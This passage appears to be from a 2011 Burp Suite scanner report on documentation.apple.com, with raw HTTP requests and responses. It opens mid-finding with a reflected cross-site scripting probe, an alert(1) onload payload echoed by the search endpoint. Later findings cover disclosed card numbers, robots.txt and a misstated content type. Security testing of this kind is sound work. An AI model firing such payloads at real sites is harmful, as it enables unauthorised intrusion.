User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=...[SNIP]...; geo=US

Response

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1637
Vary: Accept-Encoding
Cache-Control: max-age=541
Expires: Fri, 15 Jul 2011 20:20:07 GMT
Date: Fri, 15 Jul 2011 20:11:06 GMT
Connection: close

{"GSP":{"Spelling":{"Suggestion":{"$t":"xss8d376&lt;a xmlns:a=&#39;http://www.w3.org/1999/xhtml&#39;&gt;&lt;a:body onload=&#39;alert(1)&#39;/&gt;&lt;/<b><i>aa</i></b>&gt;aa2eaeea1ca","q":"xss8d376<a x
...[SNIP]...
</aa>aa2eaeea1ca"}},"Q":{"$t":"xss8d376<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>aa2eaeea1ca"},"TM":{"$t":"0.027944"},"VER":"3.2","PARAM":[{"value":"xss8d376<a xmlns:a='http://www.w3.org/1999/xhtml'>
...[SNIP]...

4. Credit card numbers disclosed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://documentation.apple.com
Path:   /en/finalcutserver_otherhelp/Final%20Cut%20Server%20Setup%20Guide%20(en).pdf

Issue detail

The following credit card numbers were disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /en/finalcutserver_otherhelp/Final%20Cut%20Server%20Setup%20Guide%20(en).pdf HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/en/finalcutserver/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=...[SNIP]...; geo=US

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 11 Jul 2011 23:24:23 GMT
ETag: "503721-36c672-4a7d37bc097c0"
Server: Apache/2.2.17 (Unix) PHP/5.3.4
Accept-Ranges: bytes
Content-Length: 3589746
Content-Type: application/apple-documentation-pdf
Cache-Control: max-age=799
Expires: Fri, 15 Jul 2011 20:23:53 GMT
Date: Fri, 15 Jul 2011 20:10:34 GMT
Connection: close

%PDF-1.4%....
...[SNIP]...

5. Robots.txt file

Summary

Severity:   Information
Confidence:   Certain
Host:   http://documentation.apple.com
Path:   /en/aperture/usermanual/

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection against unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: documentation.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 11 Jul 2011 23:24:45 GMT
ETag: "44d893-102-4a7d37d104940"
Server: Apache/2.2.17 (Unix) PHP/5.3.4
ntCoent-Length: 258
Content-Type: text/plain
Cache-Control: max-age=153
Expires: Fri, 15 Jul 2011 20:12:23 GMT
Date: Fri, 15 Jul 2011 20:09:50 GMT
Content-Length: 258
Connection: close

# robots.txt for http://documentation.apple.com/
# See: http://www.robotstxt.org/
User-agent: *
Disallow: /AlertMessages/
Disallow: /Resources/
Disallow: /SharedResources/
Disallow: /search/

# For Go
...[SNIP]...

6. Content type incorrectly stated

Summary

Severity:   Information
Confidence:   Firm
Host:   http://documentation.apple.com
Path:   /cgi-bin/sp/nph-search

Issue detail

The response contains the following Content-type statement: text/xml. The response states that it contains XML. However, it actually appears to contain JSON.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=xss HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=...[SNIP]...; geo=US

Response

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1109
Vary: Accept-Encoding
Cache-Control: max-age=575
Expires: Fri, 15 Jul 2011 20:20:29 GMT
Date: Fri, 15 Jul 2011 20:10:54 GMT
Connection: close

{"GSP":{"Q":{"$t":"xss"},"TM":{"$t":"0.016109"},"VER":"3.2","PARAM":[{"value":"xss","name":"q","original_value":"xss"},{"value":"xml","name":"output","original_value":"xml"},{"value":"default_frontend
...[SNIP]...
